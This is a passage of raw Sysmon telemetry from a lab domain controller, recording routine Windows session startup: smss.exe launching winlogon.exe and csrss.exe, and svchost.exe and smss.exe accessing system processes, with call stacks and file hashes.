13:58:14.774{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1abf6|c:\windows\system32\lsm.dll+22cc9|c:\windows\system32\lsm.dll+bcaf|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000009685Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:14.774{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+1abdc|c:\windows\system32\lsm.dll+22cc9|c:\windows\system32\lsm.dll+bcaf|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000009684Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:14.774{59A5CD1D-93F6-6005-E504-00000000A301}45482604C:\Windows\System32\smss.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\SYSTEM32\ntdll.dll+8bf9e|C:\Windows\SYSTEM32\ntdll.dll+8bd49|\SystemRoot\System32\smss.exe+2795|\SystemRoot\System32\smss.exe+2042|\SystemRoot\System32\smss.exe+1d5e|\SystemRoot\System32\smss.exe+1b09|\SystemRoot\System32\smss.exe+14cb|\SystemRoot\System32\smss.exe+130f|\SystemRoot\System32\smss.exe+1096|C:\Windows\SYSTEM32\ntdll.dll+5179f 154100x80000000000000009683Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:14.771{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\System32\winlogon.exe10.0.14393.3204 (rs1_release.190830-1500)Windows Logon ApplicationMicrosoft® Windows® Operating SystemMicrosoft CorporationWINLOGON.EXEwinlogon.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e72SystemMD5=DEA4CE12F24601830083126E18A2C7C9,SHA256=F002F8C2EA49D21F242996E3D57F5FDD7995FE6DB524BB69BBD7F190CC0211A9,IMPHASH=3CF10D94C117DB4F6E9D523B93429D6D{59A5CD1D-93F6-6005-E504-00000000A301}4548C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 00000104 0000007c 10341000x80000000000000009682Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:14.758{59A5CD1D-8E42-6005-0200-00000000A301}4484744C:\Windows\System32\smss.exe{59A5CD1D-93F6-6005-E604-00000000A301}4888C:\Windows\system32\csrss.exe0x101441C:\Windows\SYSTEM32\ntdll.dll+a6624|\SystemRoot\System32\smss.exe+3fee|\SystemRoot\System32\smss.exe+3b53|C:\Windows\SYSTEM32\ntdll.dll+1d3f1|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009681Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:14.758{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F6-6005-E604-00000000A301}4888C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+1a7a4|c:\windows\system32\lsm.dll+1aa31|C:\Windows\SYSTEM32\ntdll.dll+1d3f1|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009680Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:14.743{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009679Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:14.743{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009678Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:14.743{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009677Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:14.743{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009676Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:14.743{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009675Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:14.743{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009674Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:14.743{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009673Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:14.743{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009672Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:14.743{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009671Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:14.743{59A5CD1D-93F6-6005-E504-00000000A301}45482604C:\Windows\System32\smss.exe{59A5CD1D-93F6-6005-E604-00000000A301}4888C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\SYSTEM32\ntdll.dll+8bf9e|C:\Windows\SYSTEM32\ntdll.dll+8bd49|\SystemRoot\System32\smss.exe+2795|\SystemRoot\System32\smss.exe+1ee4|\SystemRoot\System32\smss.exe+20a1|\SystemRoot\System32\smss.exe+1c92|\SystemRoot\System32\smss.exe+1af6|\SystemRoot\System32\smss.exe+14cb|\SystemRoot\System32\smss.exe+130f|\SystemRoot\System32\smss.exe+1096|C:\Windows\SYSTEM32\ntdll.dll+5179f 154100x80000000000000009670Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:14.753{59A5CD1D-93F6-6005-E604-00000000A301}4888C:\Windows\System32\csrss.exe10.0.14393.2969 (rs1_release.190503-1820)Client Server Runtime ProcessMicrosoft® Windows® Operating SystemMicrosoft CorporationCSRSS.Exe%%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e72SystemMD5=955E9227AA30A08B7465C109B863B886,SHA256=D896480BC8523FAD3AE152C81A2B572022C3778A34A6D85E089D150A68E9165E,IMPHASH=273BC9D936389D79244E6E56BE5096B6{59A5CD1D-93F6-6005-E504-00000000A301}4548C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 00000104 0000007c 10341000x80000000000000009669Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:14.743{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009668Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:14.743{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009667Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:14.743{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009666Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:14.743{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009665Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:14.743{59A5CD1D-8E42-6005-0200-00000000A301}4484744C:\Windows\System32\smss.exe{59A5CD1D-93F6-6005-E504-00000000A301}4548C:\Windows\System32\smss.exe0x101441C:\Windows\SYSTEM32\ntdll.dll+a6624|\SystemRoot\System32\smss.exe+3fee|\SystemRoot\System32\smss.exe+3b53|C:\Windows\SYSTEM32\ntdll.dll+1d3f1|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009664Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:14.743{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009663Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:14.743{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009662Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:14.743{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009661Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:14.743{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009660Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 